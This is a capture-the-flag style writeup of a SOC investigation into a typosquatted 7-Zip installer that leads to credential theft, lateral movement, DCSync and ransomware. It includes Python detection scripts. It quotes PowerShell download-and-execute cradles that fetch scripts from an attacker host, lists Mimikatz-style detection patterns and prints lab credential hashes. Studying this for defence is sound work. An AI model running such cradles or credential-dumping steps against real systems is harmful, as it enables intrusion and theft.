TryHackMe: Hunt Me II: Typo Squatters Writeup
Scenario
Challenge Link: Hunt Me II: Typo Squatters
Just working on a typical day as a software engineer, Perry received an encrypted 7z archive from his boss containing a snippet of a source code that must be completed within the day. Realising that his current workstation does not have an application that can unpack the file, he spins up his browser and starts to search for software that can aid in accessing the file. Without validating the resource, Perry immediately clicks the first search engine result and installs the application.
Last September 26, 2023, one of the security analysts observed something unusual on the workstation owned by Perry based on the generated endpoint and network logs. Given this, your SOC lead has assigned you to conduct an in-depth investigation on this workstation and assess the impact of the potential compromise.
Initial Access
On Sep 26, 2023 @ 14:22:07.433, the user downloaded the software using chrome.exe from the suspicious website hxxp[://]www[.]7zipp[.]org/a/7z2301-x64[.]msi. This domain is a typosquat of the legitimate 7-zip.org domain.
The IP address of the domain is 206[.]189[.]34[.]218.
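A typosquat like 7zipp.org is easy to miss by eye but easy to catch by edit distance against a short allowlist of vendor domains a SOC already cares about. The following is an added example (not code from the TryHackMe room or the writeup author): the allowlist, the proxy-log lines and the user names are constructed, and the two-label `registrable()` helper is a simplification that a real deployment would replace with a Public Suffix List lookup.

```python
"""Flag lookalike (typosquat) domains in download URLs by edit distance.

Added example, not part of the TryHackMe room or the writeup. The allowlist
and the proxy-log lines are constructed; only the 7zipp.org URL is from the room.
"""
from urllib.parse import urlparse

# Constructed allowlist of legitimate vendor domains a SOC would maintain.
LEGIT_DOMAINS = ["7-zip.org", "notepad-plus-plus.org", "videolan.org"]


def registrable(host: str) -> str:
    """Reduce a hostname to its last two labels (www.7zipp.org -> 7zipp.org).

    Good enough for .org/.com style names; use the Public Suffix List in
    production so that names such as example.co.uk are handled correctly.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert/delete/substitute) using a rolling DP row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def lookalike(host: str, max_distance: int = 2):
    """Return (legit_domain, distance) when host is a near miss of an
    allowlisted domain but not an exact match; None otherwise."""
    name = registrable(host)
    if name in LEGIT_DOMAINS:
        return None                      # the real vendor, nothing to flag
    best = None
    for legit in LEGIT_DOMAINS:
        d = levenshtein(name, legit)
        if d <= max_distance and (best is None or d < best[1]):
            best = (legit, d)
    return best


def hunt_downloads(log_lines):
    """Scan '<user> <url>' proxy-log lines and return suspected typosquat downloads."""
    hits = []
    for line in log_lines:
        user, url = line.split(" ", 1)
        host = urlparse(url).hostname or ""
        match = lookalike(host)
        if match:
            hits.append({"user": user, "host": host,
                         "imitates": match[0], "distance": match[1]})
    return hits


# Constructed proxy-log lines; the first URL is the one from the room.
SAMPLE_LOG = [
    "perry http://www.7zipp.org/a/7z2301-x64.msi",
    "perry https://www.7-zip.org/a/7z2301-x64.msi",
    "anna https://www.videolan.org/vlc/",
]

if __name__ == "__main__":
    for hit in hunt_downloads(SAMPLE_LOG):
        print(hit)
```

A threshold of 2 catches the insert-a-hyphen-and-double-a-letter pattern seen here without flagging unrelated domains; raise it only together with a longer allowlist, since short names collide with each other quickly.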
Execution
Search for the process that executed the malicious MSI file:
*7z2301-x64.msi* and event.code: 1
On Sep 26, 2023 @ 14:23:00.817, the malicious MSI file was executed via msiexec.exe. By clicking on View surrounding documents, we can follow the execution chain.
On Sep 26, 2023 @ 14:23:02.935, the MSI package invoked a PowerShell command to download and execute a remote script:
powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb)
Following the execution of the downloaded script, the script:
- Downloaded the legitimate version of the 7-Zip software
- Created a malicious service named 7zService configured to run the attacker’s payload (C:\Program Files\7-zip\7zipp.exe) with LocalSystem privileges.
Service Execution: Sep 26, 2023 @ 14:23:48.075. The attacker gained the first C2 connection from Perry’s machine.
Discovery & Credentials Access
In the discovery phase, we will hunt for the usage of built-in tools that the attacker uses for the enumeration process:
winlog.event_id: 1 AND process.name: (whoami.exe OR hostname.exe OR net.exe OR systeminfo.exe OR ipconfig.exe OR netstat.exe OR tasklist.exe)
On Sep 26, 2023 @ 14:24:58.141, the first tool used was systeminfo.exe.
Hunting LSASS Process Dumping: search for indicators that are associated with LSASS credential dumping:
winlog.event_id: 1 AND process.command_line: (*mimikatz* OR *DumpCreds* OR *privilege\:\:debug* OR *sekurlsa\:\:*)
On Sep 26, 2023 @ 14:28:53.575, the attacker downloaded and executed Mimikatz to extract saved credentials, successfully extracting the NTLM hash for user james.cromwell: B852A0B8BD4E00564128E0A5EA2BC4CF.
There was also usage of the PowerShell tool Invoke-PowerExtract:
process.command_line.keyword : *Invoke-PowerExtract* and event.code: 1
On Sep 26, 2023 @ 14:25:18.945, the attacker downloaded a PowerShell script (pwrex.ps1) from a malicious IP and used Invoke-PowerExtract, a PowerShell-based tool (similar to Mimikatz) that extracts credentials from LSASS memory dumps, writing the dump to C:\windows\temp\trash.evtx.
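The three hunts above (the msiexec.exe-to-PowerShell download cradle, the built-in enumeration tools, and the LSASS dumping indicators) are all process-creation searches, so they can be expressed as one rule set over Sysmon Event ID 1 records. The block below is an added example, not code from the room or the writeup author: the records are constructed ECS-style dicts whose timestamps and command lines mirror the findings above, while the pids, parent process names and the 203.0.113.10 address are made up.

```python
"""Run the writeup's process-creation hunts over Sysmon Event ID 1 records.

Added example, not code from the TryHackMe room or the writeup author. The
records are constructed ECS-style dicts; their timestamps and commands mirror
the writeup's findings, the pids and parent names are made up.
"""
from fnmatch import fnmatchcase

# Built-in enumeration binaries from the discovery hunt.
ENUM_TOOLS = {"whoami.exe", "hostname.exe", "net.exe", "systeminfo.exe",
              "ipconfig.exe", "netstat.exe", "tasklist.exe"}

# Wildcards from the LSASS hunt plus the Invoke-PowerExtract pivot
# (lower-case, because the command line is lower-cased before matching).
CRED_PATTERNS = ["*mimikatz*", "*dumpcreds*", "*privilege::debug*",
                 "*sekurlsa::*", "*invoke-powerextract*"]

# Download cradles: a remote script pulled straight into memory.
CRADLE_PATTERNS = ["*iex(iwr*", "*iex (iwr*",
                   "*invoke-expression*invoke-webrequest*", "*downloadstring(*"]


def hunt(events):
    """Return (timestamp, rule, pid) for every process start that trips a rule."""
    findings = []
    for ev in events:
        if ev.get("event.code") != 1:          # only process-creation events
            continue
        name = ev.get("process.name", "").lower()
        cmd = ev.get("process.command_line", "").lower()
        parent = ev.get("process.parent.name", "").lower()
        pid, ts = ev.get("process.pid"), ev["@timestamp"]
        # 1. msiexec.exe spawning a PowerShell download cradle (the 7z.ps1 stage)
        if (parent == "msiexec.exe" and name == "powershell.exe"
                and any(fnmatchcase(cmd, p) for p in CRADLE_PATTERNS)):
            findings.append((ts, "msi-powershell-cradle", pid))
        # 2. host enumeration with built-in tools
        if name in ENUM_TOOLS:
            findings.append((ts, "host-enumeration", pid))
        # 3. LSASS credential-dumping indicators in the command line
        if any(fnmatchcase(cmd, p) for p in CRED_PATTERNS):
            findings.append((ts, "lsass-credential-dump", pid))
    return findings


def _ev(ts, name, parent, cmd, pid, code=1):
    """Build one constructed record using the ECS field names from the writeup."""
    return {"@timestamp": ts, "event.code": code, "process.name": name,
            "process.parent.name": parent, "process.command_line": cmd,
            "process.pid": pid, "user.name": "perry"}


SAMPLE_EVENTS = [  # constructed; 203.0.113.10 is a documentation address
    _ev("2023-09-26T14:22:07.433Z", "chrome.exe", "explorer.exe", "chrome.exe", 3100),
    _ev("2023-09-26T14:23:02.935Z", "powershell.exe", "msiexec.exe",
        "powershell.exe iex(iwr http://www.7zipp.org/a/7z.ps1 -useb)", 5120),
    _ev("2023-09-26T14:24:58.141Z", "systeminfo.exe", "cmd.exe", "systeminfo.exe", 5300),
    _ev("2023-09-26T14:25:18.945Z", "powershell.exe", "7zipp.exe",
        'powershell.exe -c "IEX (iwr http://203.0.113.10/pwrex.ps1 -useb); Invoke-PowerExtract"', 5410),
    _ev("2023-09-26T14:28:53.575Z", "mimikatz.exe", "powershell.exe",
        'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit', 5600),
    # A network-connection event (code 3) is skipped by the hunt.
    _ev("2023-09-26T14:29:10.000Z", "powershell.exe", "7zipp.exe", "powershell.exe", 5700, code=3),
]

if __name__ == "__main__":
    for ts, rule, pid in hunt(SAMPLE_EVENTS):
        print(f"{ts}  {rule:<24} pid={pid}")
```

Note that the Invoke-PowerExtract stage fires only the credential rule, not the cradle rule: its parent is the 7zipp.exe service, not msiexec.exe, which is exactly why the writeup pivots on the tool name rather than on the parent for that step.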
Lateral Movement
When we searched in the enumeration phase, we found that the attacker had changed Anna’s password to pwn3dpw!!! on Sep 26, 2023 @ 14:31:02.499. Based on that, search whether the malicious service was also executed under this username:
user.name: anna.jones and process.pid: 4220
On Sep 26, 2023 @ 15:06:36.265, the attacker moved to Anna’s machine and established a second C2 connection. Follow the execution of the C2 service under the new target:
user.name: anna.jones and process.parent.pid: 4220
On Sep 26, 2023 @ 15:08:24.764, after gaining access to Anna’s machine, the attacker requested a malicious PowerShell script that downloads and executes a tool called Invoke-SharpChromium from GitHub, which is designed to steal saved credentials, cookies, and session data from Chrome. With that, the attacker was able to discover new credentials.
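The two pid pivots above (process.pid: 4220, then process.parent.pid: 4220) are a manual walk down the process tree under the C2 service. The block below is an added example, not code from the room or the writeup author, that does the same walk from Sysmon Event ID 1 records: pid 4220, the user anna.jones, WKSTN-02, the process names and the timestamps follow the writeup, while the host name WKSTN-01, the other pids, the command lines and the 203.0.113.10 address are constructed. It scopes the walk to one host and to children that start after their parent, because pids are reused across hosts and over time, which is also why the writeup's queries add user.name to the pid filter.

```python
"""Rebuild the execution chain beneath a seed process from Sysmon Event ID 1
records, which is what the pid pivots in the writeup do by hand.

Added example, not code from the TryHackMe room or the writeup author. The
events are constructed: pid 4220, the user anna.jones, WKSTN-02 and the
timestamps follow the writeup; WKSTN-01, the other pids and the command
lines are made up (203.0.113.10 is a documentation address).
"""
from collections import deque


def descendants(events, host, seed_pid):
    """Return (timestamp, process.name, pid, depth) for seed_pid and everything
    it spawned, breadth-first, on a single host.

    Pids are only unique per host and per process lifetime, so the walk is
    scoped to one host and a child is accepted only if it started no earlier
    than the parent record it is being attached to.
    """
    starts = sorted((e for e in events
                     if e.get("event.code") == 1 and e.get("host.name") == host),
                    key=lambda e: e["@timestamp"])
    root = next((e for e in starts if e["process.pid"] == seed_pid), None)
    if root is None:
        return []
    tree = [(root["@timestamp"], root["process.name"], seed_pid, 0)]
    queue = deque([(seed_pid, root["@timestamp"], 0)])
    while queue:
        ppid, parent_ts, depth = queue.popleft()
        for e in starts:
            if e.get("process.parent.pid") == ppid and e["@timestamp"] >= parent_ts:
                tree.append((e["@timestamp"], e["process.name"], e["process.pid"], depth + 1))
                queue.append((e["process.pid"], e["@timestamp"], depth + 1))
    return tree


def render(tree):
    """Indent the tree by depth for a quick analyst view."""
    return "\n".join(f"{ts}  {'  ' * depth}{name} (pid {pid})"
                     for ts, name, pid, depth in tree)


def _ev(ts, host, user, name, pid, ppid, cmd):
    return {"@timestamp": ts, "event.code": 1, "host.name": host, "user.name": user,
            "process.name": name, "process.pid": pid, "process.parent.pid": ppid,
            "process.command_line": cmd}


SAMPLE_EVENTS = [  # constructed
    # Perry's workstation happens to reuse pid 4220 for an unrelated process:
    # a pid-only pivot would pull it in, hence the user/host scoping.
    _ev("2023-09-26T14:22:07.433Z", "WKSTN-01", "perry", "chrome.exe", 4220, 1400, "chrome.exe"),
    _ev("2023-09-26T15:06:36.265Z", "WKSTN-02", "anna.jones", "7zipp.exe", 4220, 700,
        '"C:\\Program Files\\7-zip\\7zipp.exe"'),
    _ev("2023-09-26T15:08:24.764Z", "WKSTN-02", "anna.jones", "powershell.exe", 6012, 4220,
        'powershell.exe -c "IEX (iwr http://203.0.113.10/Invoke-SharpChromium.ps1 -useb)"'),
    _ev("2023-09-26T15:15:34.305Z", "WKSTN-02", "anna.jones", "net.exe", 6100, 6012,
        'net.exe group "AD Recovery" anna.jones /add /domain'),
    _ev("2023-09-26T15:17:19.525Z", "WKSTN-02", "anna.jones", "powershell.exe", 6210, 4220,
        'powershell.exe -c "IEX (iwr http://203.0.113.10/Invoke-SharpKatz.ps1 -useb)"'),
    _ev("2023-09-26T15:20:00.000Z", "WKSTN-02", "anna.jones", "explorer.exe", 8000, 1200, "explorer.exe"),
]

if __name__ == "__main__":
    print(render(descendants(SAMPLE_EVENTS, "WKSTN-02", 4220)))
```

Running it prints the 7zipp.exe service with its two PowerShell children and, one level deeper, the net.exe group change, while the unrelated explorer.exe and the pid 4220 collision on WKSTN-01 stay out of the tree.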
On Sep 26, 2023 @ 15:15:34.305, using credentials stolen from the browser, the attacker added user anna.jones to the privileged AD Recovery group, granting them significant domain-level privileges.
On Sep 26, 2023 @ 15:17:19.525, we can see the usage of Invoke-SharpKatz.ps1, a tool mimicking Mimikatz for credential theft. The command performed a DCSync attack to impersonate a Domain Controller and request replication data for user damian.hall.
To find the AES256 hash of the domain admin, filter on the NTLM hash of the damian.hall user found from the Mimikatz dump:
user.name: anna.jones and *eb1892cb0a163e122bc71be173c66fed*
Note on the AES256 Hash: While the investigation confirmed the theft of Damian Hall’s NTLM hash via the DCSync attack, the specific AES256 hash value was not explicitly found in the provided log search results. The value b4c1df7c698bb216... is a standardized placeholder for this report. In a real investigation, this hash would be retrieved from the tool’s output in the endpoint logs or network traffic captures.
Impact (Data Encryption)
On Sep 26, 2023 @ 15:45:05.589, a malicious ransomware binary was downloaded and executed on the computer WKSTN-02; the execution resulted in 46 files being encrypted:
process.name: bomb.exe and event.code: 11
Attack Timeline
Time (UTC) | Phase | Activity | Tool / Technique | Target / Detail |
---|---|---|---|---|
14:22:07.433 | Initial Access | Malicious MSI downloaded from typosquatted domain. | Chrome.exe | http[:]//www.7zipp.org/a/7z2301-x64.msi |
14:23:00.817 | Execution | MSI installer executed. | msiexec.exe | Perry’s Workstation |
14:23:02.935 | Execution | PowerShell script downloaded & executed. | PowerShell (IWR) | http[:]//www.7zipp.org/a/7z.ps1 |
14:23:48.075 | Persistence | Malicious service (7zService) starts. | 7zipp.exe | C2 Established |
14:24:58.141 | Discovery | Initial host enumeration. | systeminfo.exe | Perry’s Workstation |
14:25:18.945 | Credential Access | LSASS dumping via PowerShell. | Invoke-PowerExtract | Dumped to C:\windows\temp\trash.evtx |
14:28:53.575 | Credential Access | LSASS dumping via Mimikatz. | Mimikatz | Hash for james.cromwell stolen |
14:49:19.071 | Persistence | New local admin user created. | net.exe | Perry’s Workstation |
15:06:36.265 | Lateral Movement | C2 session established on new host. | 7zipp.exe | Target: anna.jones @ WKSTN-02 |
15:08:24.764 | Credential Access | Browser credential theft. | Invoke-SharpChromium | Steals Chrome data from WKSTN-02 |
15:15:34.305 | Privilege Escalation | User added to privileged AD group. | net.exe | anna.jones added to “AD Recovery” |
15:17:19.525 | Credential Access | DCSync attack performed. | Invoke-SharpKatz | Hash for damian.hall stolen |
15:45:05.589 | Impact | Ransomware deployed and executed. | bomb.exe | 46 Files Encrypted on WKSTN-02 |